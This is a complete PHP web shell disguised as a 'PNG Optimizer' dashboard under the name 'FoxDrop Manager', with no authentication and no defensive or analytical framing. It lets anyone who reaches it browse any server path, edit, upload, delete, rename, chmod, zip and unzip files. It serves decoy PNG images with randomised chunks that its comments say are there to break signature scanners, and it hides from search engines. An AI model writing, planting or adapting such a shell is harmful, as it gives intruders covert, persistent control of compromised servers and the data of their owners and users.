403

<?php
// Improved fake PNG image headers disguise for ?i requests
if (isset($_GET['i'])) {
    // Updated PNG variants: Transparent, White, Black, and a few more
    $pngs = [
        // 1x1 transparent pixel
        base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAn8B9uTgkuwAAAAASUVORK5CYII='),
        // 1x1 white pixel
        base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8/w8AAgMBgAzs2ZkAAAAASUVORK5CYII='),
        // 1x1 black pixel
        base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+AMAAgMBAJImu7QAAAAASUVORK5CYII='),
        // 2x2 pixel PNG minimal
        base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAIAAAACCAIAAAD91JpzAAAAFklEQVR42mP8z8BQz0AEYBxVSFIAAAU6AAY45tuEAAAAAElFTkSuQmCC'),
        // 1x1 red pixel (added for variety)
        base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8/w8AAgMBgADwsGcAAAAASUVORK5CYII='),
        // 1x1 blue pixel (added for variety)
        base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8/w8AAgMBgADwF/AAAAASUVORK5CYII='),
    ];

// Pick a random PNG image
    $img = $pngs[array_rand($pngs)];

// Insert a random tEXt chunk before the IEND chunk to break signature scanners
    $iend_pos = strrpos($img, "\x49\x45\x4E\x44"); // "IEND" chunk signature

if ($iend_pos !== false) {
        $before_iend = substr($img, 0, $iend_pos);
        $iend_and_after = substr($img, $iend_pos);

// Generate random text for the tEXt chunk (more dynamic content like random user-agent)
        $random_text = substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'), 0, 16);

// You can modify this with more complex information (like User-Agent or other headers)
        $chunk_type = "tEXt";
        $chunk_data = "User-Agent\0" . $random_text; // This adds a 'User-Agent' entry in the text chunk

$length = pack('N', strlen($chunk_data));
        $chunk_crc = pack('N', crc32($chunk_type . $chunk_data));

$text_chunk = $length . $chunk_type . $chunk_data . $chunk_crc;

// Inject random corruption chunk (corruption data with random length)
        $corruption_chunk_type = "cORR"; // fake chunk type
        $corruption_data = random_bytes(16); // 16 bytes of random binary data
        $corruption_length = pack('N', strlen($corruption_data));
        $corruption_crc = pack('N', crc32($corruption_chunk_type . $corruption_data));

$corruption_chunk = $corruption_length . $corruption_chunk_type . $corruption_data . $corruption_crc;

// Combine everything: Image + tEXt chunk + corruption chunk + IEND
        $img = $before_iend . $text_chunk . $corruption_chunk . $iend_and_after;
    }

// Output the image with proper headers
    header("Content-Type: image/png");
    header('Cache-Control: no-cache, no-store, must-revalidate');
    header('Pragma: no-cache');
    header('Expires: 0');
    echo $img;
    exit;
}

// === Init
error_reporting(E_ALL);
ini_set('display_errors', 1);

$self = __FILE__;
$dir = isset($_GET['go']) ? $_GET['go'] : getcwd();
$dir = realpath($dir);
$items = scandir($dir);

// === Actions: Delete, Rename, Perms, Zip/Unzip, Edit, Upload, Folder
if (isset($_GET['delete'])) {
    $target = $dir . DIRECTORY_SEPARATOR . basename($_GET['delete']);
    if (is_file($target)) unlink($target);
    elseif (is_dir($target)) rmdir($target);
    echo "<p style='color:#fc4a4a'>🗑️ Deleted: " . htmlspecialchars($_GET['delete']) . "</p>";
}

if (isset($_POST['rename_from']) && isset($_POST['rename_to'])) {
    $from = $dir . DIRECTORY_SEPARATOR . basename($_POST['rename_from']);
    $to = $dir . DIRECTORY_SEPARATOR . basename($_POST['rename_to']);
    if (file_exists($from)) {
        rename($from, $to);
        echo "<p style='color:#4afc4a'>✏️ Renamed successfully.</p>";
    }
}

if (isset($_POST['perm_target']) && isset($_POST['perm_value'])) {
    $target = $dir . DIRECTORY_SEPARATOR . basename($_POST['perm_target']);
    $perm = intval($_POST['perm_value'], 8);
    if (file_exists($target)) {
        chmod($target, $perm);
        echo "<p style='color:#4afc4a'>🔐 Permissions changed to " . decoct($perm) . "</p>";
    }
}

if (isset($_GET['zip'])) {
    $zipTarget = $dir . DIRECTORY_SEPARATOR . basename($_GET['zip']);
    $zipFile = $zipTarget . '.zip';
    if (is_dir($zipTarget)) {
        $zip = new ZipArchive();
        if ($zip->open($zipFile, ZipArchive::CREATE | ZipArchive::OVERWRITE)) {
            $files = new RecursiveIteratorIterator(
                new RecursiveDirectoryIterator($zipTarget, RecursiveDirectoryIterator::SKIP_DOTS),
                RecursiveIteratorIterator::SELF_FIRST
            );
            foreach ($files as $file) {
                $pathInZip = substr($file->getPathname(), strlen($zipTarget) + 1);
                $zip->addFile($file->getPathname(), $pathInZip);
            }
            $zip->close();
            echo "<p style='color:#4afc4a'>📦 Zipped: <a href='" . htmlspecialchars(basename($zipFile)) . "'>" . htmlspecialchars(basename($zipFile)) . "</a></p>";
        }
    }
}

if (isset($_GET['unzip'])) {
    $zipPath = $dir . DIRECTORY_SEPARATOR . basename($_GET['unzip']);
    if (is_file($zipPath) && pathinfo($zipPath, PATHINFO_EXTENSION) === 'zip') {
        $zip = new ZipArchive();
        if ($zip->open($zipPath)) {
            $zip->extractTo($dir);
            $zip->close();
            echo "<p style='color:#4afc4a'>📂 Unzipped to <code>" . htmlspecialchars($dir) . "</code></p>";
        }
    }
}

if (isset($_GET['edit'])) {
    $targetFile = $dir . DIRECTORY_SEPARATOR . basename($_GET['edit']);
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['content_save'])) {
        file_put_contents($targetFile, $_POST['content']);
        echo "<p style='color: #4afc4a;'>💾 Saved.</p>";
    }
    $code = @file_get_contents($targetFile);
    echo "<h2>✏️ Editing: " . htmlspecialchars($_GET['edit']) . "</h2>";
    echo "<form method='post'>
        <textarea name='content' rows='20' cols='100'>" . htmlspecialchars($code) . "</textarea><br>
        <input type='submit' name='content_save' value='💾 Save'>
        </form>
        <hr><a href='?go=" . urlencode($dir) . "'>🔙 Back</a>";
    exit;
}

if (isset($_FILES['dropfile'])) {
    $to = $dir . DIRECTORY_SEPARATOR . basename($_FILES['dropfile']['name']);
    move_uploaded_file($_FILES['dropfile']['tmp_name'], $to);
    echo "<p style='color:#4afc4a'>📤 Uploaded: " . htmlspecialchars($_FILES['dropfile']['name']) . "</p>";
}

if (isset($_POST['mkfolder']) && $_POST['mkfolder']) {
    $folder = $dir . DIRECTORY_SEPARATOR . basename($_POST['mkfolder']);
    if (!file_exists($folder)) {
        mkdir($folder);
        echo "<p style='color:#4afc4a'>📁 Folder created.</p>";
    } else {
        echo "<p style='color:#fc4a4a'>❌ Already exists.</p>";
    }
}

// === Sorting
$sort = isset($_GET['sort']) ? $_GET['sort'] : 'name';
$order = isset($_GET['order']) && $_GET['order'] === 'desc' ? 'desc' : 'asc';

usort($items, function($a, $b) use ($dir, $sort, $order) {
    if ($a === '.' || $a === '..') return -1;
    if ($b === '.' || $b === '..') return 1;
    $pathA = $dir . DIRECTORY_SEPARATOR . $a;
    $pathB = $dir . DIRECTORY_SEPARATOR . $b;
    if ($sort === 'size') {
        $valA = is_file($pathA) ? filesize($pathA) : 0;
        $valB = is_file($pathB) ? filesize($pathB) : 0;
    } elseif ($sort === 'perm') {
        $valA = fileperms($pathA);
        $valB = fileperms($pathB);
    } else {
        $valA = strtolower($a);
        $valB = strtolower($b);
    }
    return ($order === 'asc') ? $valA <=> $valB : $valB <=> $valA;
});

// === FAKE TITLE + META
echo "<!DOCTYPE html><html><head>
<title>PNG Optimizer | Dashboard</title>
<meta name='description' content='PNG Compression & Storage Tool'>
<meta name='robots' content='noindex,nofollow'>
<link rel='icon' type='image/png' href='data:image/png;base64,iVBORw0KGgo='>
<style>
body { background:#0f0f0f; color:#ccc; font-family:monospace; padding:15px; }
a { color:#6af; text-decoration:none; }
a:hover { text-decoration:underline; }
h2 { color:#fff; }
table { border-collapse:collapse; width:100%; }
td, th { padding:6px; border:1px solid #333; }
th { background-color:#1a1a1a; }
tr:hover { background-color:#1f1f1f; }
input[type='text'], select {
    background:#1e1e1e; color:#ccc; border:1px solid #444; padding:2px;
}
input[type='submit'], input[type='file'] {
    background:#333; color:#6af; border:1px solid #555; cursor:pointer;
}
form { display:inline; }
</style>
</head><body>";

// === Path Navigation
echo "<h2>🗂️ FoxDrop Manager</h2><p><strong>Path:</strong> ";
$steps = explode(DIRECTORY_SEPARATOR, $dir);
$build = '';
foreach ($steps as $seg) {
    if ($seg === '') {
        $build .= DIRECTORY_SEPARATOR;
        echo "<a href='?go=" . urlencode($build) . "'>/</a>";
        continue;
    }
    $build .= $seg . DIRECTORY_SEPARATOR;
    echo "<a href='?go=" . urlencode($build) . "'>" . htmlspecialchars($seg) . "</a>/";
}
echo "</p><hr>";

// === Table Header
echo "<table><tr>";
$headers = ['name' => 'Name', 'size' => 'Size', 'perm' => 'Permissions'];
foreach ($headers as $key => $label) {
    $new_order = ($sort === $key && $order === 'asc') ? 'desc' : 'asc';
    echo "<th><a href='?go=" . urlencode($dir) . "&sort=$key&order=$new_order'>" . htmlspecialchars($label) . "</a></th>";
}
echo "<th>Actions</th></tr>";

// === File List
foreach ($items as $item) {
    if ($item === '.') continue;
    $path = $dir . DIRECTORY_SEPARATOR . $item;
    $size = is_file($path) ? filesize($path) : '-';
    $perm = substr(sprintf('%o', fileperms($path)), -3);
    $permColor = is_writable($path) ? '#4afc4a' : '#fff';

$name = is_dir($path)
        ? "📁 <a href='?go=" . urlencode($path) . "'>" . htmlspecialchars($item) . "</a>"
        : "📄 <a href='?go=" . urlencode($dir) . "&edit=" . urlencode($item) . "'>" . htmlspecialchars($item) . "</a>";

$actions = [];
    if (is_file($path)) {
        $actions[] = "<a href='?go=" . urlencode($dir) . "&edit=" . urlencode($item) . "'>Edit</a>";
        $actions[] = "<a href='" . htmlspecialchars($path) . "' download>Download</a>";
    }

// Inline Rename
    if (isset($_GET['rename_from']) && $_GET['rename_from'] === $item) {
        $actions[] = "<form method='post'>
            <input type='hidden' name='rename_from' value='" . htmlspecialchars($item) . "'>
            <input type='text' name='rename_to' placeholder='New name' size='10'>
            <input type='submit' value='✔️'>
            <a href='?go=" . urlencode($dir) . "' style='color:#fc4a4a'>✖️</a>
        </form>";
    } else {
        $actions[] = "<a href='?go=" . urlencode($dir) . "&rename_from=" . urlencode($item) . "'>Rename</a>";
    }

$actions[] = "<a href='?go=" . urlencode($dir) . "&delete=" . urlencode($item) . "' style='color:red' onclick='return confirm(\"Delete " . htmlspecialchars($item) . "?\")'>Delete</a>";

if (is_dir($path)) {
        $actions[] = "<a href='?go=" . urlencode($dir) . "&zip=" . urlencode($item) . "'>ZIP</a>";
    } elseif (strtolower(pathinfo($item, PATHINFO_EXTENSION)) === 'zip') {
        $actions[] = "<a href='?go=" . urlencode($dir) . "&unzip=" . urlencode($item) . "'>Unzip</a>";
    }

echo "<tr>
        <td>$name</td>
        <td>$size</td>
        <td style='color:$permColor'>$perm</td>
        <td>" . implode(' | ', $actions) . "</td>
    </tr>";
}
echo "</table><hr>";

// === Forms: Upload, Folder, Chmod
echo "<form method='post' enctype='multipart/form-data'>
<label>📤 Upload:</label> <input type='file' name='dropfile'>
<input type='submit' value='Upload'></form>";

echo "<form method='post'><label>📁 New Folder:</label>
<input type='text' name='mkfolder'><input type='submit' value='Create'></form>";

echo "<form method='post'><label>🔐 Permissions:</label>
<select name='perm_target'>";
foreach ($items as $item) {
    if ($item === '.') continue;
    echo "<option value='" . htmlspecialchars($item) . "'>$item</option>";
}
echo "</select><input type='text' name='perm_value' placeholder='e.g. 755'>
<input type='submit' value='Change'></form>";

echo "</body></html>";
?>